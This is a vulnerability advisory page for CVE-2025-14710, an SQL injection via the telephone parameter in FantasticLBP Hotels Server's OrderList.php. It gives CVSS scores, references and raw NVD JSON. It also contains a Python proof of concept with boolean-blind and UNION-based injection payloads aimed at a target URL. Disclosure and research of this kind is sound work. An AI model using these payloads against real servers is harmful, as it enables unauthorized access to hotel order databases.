CVE-2025-14710

Description

A vulnerability was detected in FantasticLBP Hotels Server up to 67b44df162fab26df209bd5d5d542875fcbec1d0. This affects an unknown part of the file /controller/api/OrderList.php. The manipulation of the argument telephone results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fantasticlbp:hotels_server:*:*:*:*:*:*:*:* - VULNERABLE

FantasticLBP Hotels Server <= 67b44df162fab26df209bd5d5d542875fcbec1d0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-14710 PoC - FantasticLBP Hotels Server SQL Injection
# Target: /controller/api/OrderList.php
# Parameter: telephone
# Type: Boolean-based blind SQL injection

def exploit(target_url, phone_payload):
    """
    Exploit SQL injection in FantasticLBP Hotels Server
    Target: /controller/api/OrderList.php
    Vulnerable parameter: telephone
    """
    params = {
        'telephone': phone_payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text, response.status_code
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None, None

# Example payloads for testing
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_14710.py <target_url>")
        print("Example: python cve_2025_14710.py http://victim.com/controller/api/OrderList.php")
        sys.exit(1)
    
    target = sys.argv[1]
    
    # Test basic injection
    print("[*] Testing CVE-2025-14710 SQL Injection...")
    
    # Boolean-based blind SQL injection payload
    # Checks if current user is root
    payload = "' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)='1"
    
    print(f"[*] Sending payload: {payload}")
    result, status = exploit(target, payload)
    
    if result:
        print(f"[+] Response status: {status}")
        print(f"[+] Response preview: {result[:500]}")
    
    # Additional payloads for data extraction
    # UNION-based injection to extract database version
    union_payload = "' UNION SELECT NULL,version(),user(),database()-- -"
    print(f"[*] Testing UNION payload: {union_payload}")
    result, status = exploit(target, union_payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14710
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14710
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14710/
[4] VulDB https://vuldb.com/cve/CVE-2025-14710
[5] https://github.com/navex2/CVE/issues/3
[6] https://vuldb.com/?ctiid.336427
[7] https://vuldb.com/?id.336427
[8] https://vuldb.com/?submit.707082

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14710", "sourceIdentifier": "[email protected]", "published": "2025-12-15T08:15:41.680", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in FantasticLBP Hotels Server up to 67b44df162fab26df209bd5d5d542875fcbec1d0. This affects an unknown part of the file /controller/api/OrderList.php. The manipulation of the argument telephone results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fantasticlbp:hotels_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "2019-03-23", "matchCriteriaId": "717E2963-F0AC-4603-B253-F1E7BB608234"}]}]}], "references": [{"url": "https://github.com/navex2/CVE/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.336427", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336427", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707082", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}